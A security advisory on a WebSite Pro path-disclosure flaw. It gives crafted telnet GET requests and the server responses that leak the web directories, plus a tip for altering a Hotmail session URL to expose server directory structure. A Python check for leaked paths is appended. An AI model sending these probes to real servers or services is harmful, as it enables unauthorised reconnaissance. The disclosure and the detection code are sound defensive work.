Vulnerability

    WebSite Pro

Affected

    WebSitePro 2.3.18

Description

    Lark Lizerman found the following.  WebSite Pro also reveals the web
    directory of each website in response to a simple command line.  This
    bug is similar to the reported "IIS revealing webdirectories" bug.  On
    WebSitePro the difference is the way you retrieve the path.  Example
    (made with the MS Windows Telnet client):

        Logfile:
        ========
        GET /HTTP1.0\    <------ Our command we send via Telnet on port 80 to the webserver

        Response:

        Content-length: 186

        <HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
        <BODY bgcolor="White"><H2>Document Moved</H2>
        This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here </A>.<P>
        </BODY></HTML>

        GET /HTTP1.0/

        Content-length: 230

        <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
        <BODY bgcolor="White"><H2>404 Not Found</H2>
        The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
        </BODY></HTML>

    This shows us that the HTML files are in
    D:\WEBROOTS\VHOSTS\aktenet\htdocs.  It's not a large threat, but an
    attacker might gain information about the server which should stay in
    the admin's hands.  On all other webservers, e.g. MS IIS and Apache, the
    response is "error 404".

    A tip from Noah Rathaus about the latest version of WebSite Pro (2.4.9):
    he mentioned a server running WebSite Pro 2.4.9 and discovered that the
    latest version is also vulnerable to the bug of revealing web
    directories.  In the new version the command has to be changed to
    retrieve the directory name.  When you connect to a server, send the
    command line:

        GET /HTTP1.0 \

    You now have to add a space before the last backslash of the command
    line.  That makes the server respond with a "404" error and print the
    directory name.
    Here is the part from the logfile of the Windows Telnet client
    (website.oreilly.com):

        GET /HTTP1.0 \

        HTTP/1.0 404 Not Found
        Date: Thu, 13 Jan 2000 20:47:12 GMT
        Server: WebSitePro/2.4.9
        Accept-ranges: bytes
        Content-type: text/html
        Content-length: 216

        <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
        <BODY bgcolor="White"><H2>404 Not Found</H2>
        The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c:\1Web\docs\website\HTTP1.0)</CODE><P>
        </BODY></HTML>

    This shows us the directory "c:\1Web\docs\website\".

    Hotmail?  Get into your Hotmail account.  After you are logged in,
    change the part of the address string that reads "disk=216.33.148.68_"
    to something like "disk=abc.beh.doh.cih_", i.e. put a text string in
    place of the IP address.  It will give you an error revealing the
    directory structure of the server, and after this you will be able to
    understand a big part of the address string.

Solution

    Vendor contacted and informed about the bug.  Expecting a statement
    about a fix.  Every version of WebSite (1.x, 2.x) seen behaves like this
    in the standard configuration.  However, you can avoid revealing the web
    directories by installing either one of two freely available WSAPI
    extensions, which then send out custom 404, 403 and 401 messages.  For
    more information see:

        http://software.oreilly.com/techsupport/kb/website_kb_article_display_frame.cfm?ID_KBArticle=102
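
The check below is an added example, not part of the original advisory or of any vendor code: it scans a captured error response for absolute Windows paths, one way to confirm that custom 404/403/401 messages no longer reveal the web directory. The function names, the line endings of the first sample and the whole second sample are constructed for illustration.

```python
import re

# Absolute Windows path: drive letter, colon, backslash, one or more components.
# Components exclude characters illegal in Windows file names plus "(" ")" and
# whitespace, so a match stops at the ")" or "<" that follows it in the HTML.
WIN_PATH = re.compile(r'\b[A-Za-z]:\\(?:[^\\/:*?"<>|()\s]+\\)*[^\\/:*?"<>|()\s]+')

# 404 response quoted in the advisory for WebSitePro/2.4.9 (line endings constructed).
LEAKY = (
    "HTTP/1.0 404 Not Found\r\n"
    "Server: WebSitePro/2.4.9\r\n"
    "Content-type: text/html\r\n"
    "\r\n"
    "<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>\n"
    "<BODY bgcolor=\"White\"><H2>404 Not Found</H2>\n"
    "The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>"
    "(c:\\1Web\\docs\\website\\HTTP1.0)</CODE><P>\n"
    "</BODY></HTML>"
)
# Constructed sample: a custom 404 page that echoes only the requested URL.
CUSTOM = (
    "HTTP/1.0 404 Not Found\r\n"
    "Content-type: text/html\r\n"
    "\r\n"
    "<HTML><BODY><H2>404 Not Found</H2>"
    "The requested URL /HTTP1.0 was not found.</BODY></HTML>"
)

def split_response(raw):
    """Split a raw HTTP response into (status_code or None, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split()
    code = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    return code, body

def leaked_paths(raw):
    """Return the absolute paths disclosed in the body of an error response."""
    code, body = split_response(raw)
    if code is None or code < 400:
        return []  # only 4xx/5xx error pages are in scope for this check
    return sorted(set(WIN_PATH.findall(body)))

if __name__ == "__main__":
    for name, raw in (("default 404", LEAKY), ("custom 404", CUSTOM)):
        print(name, "->", leaked_paths(raw) or "no path disclosed")
```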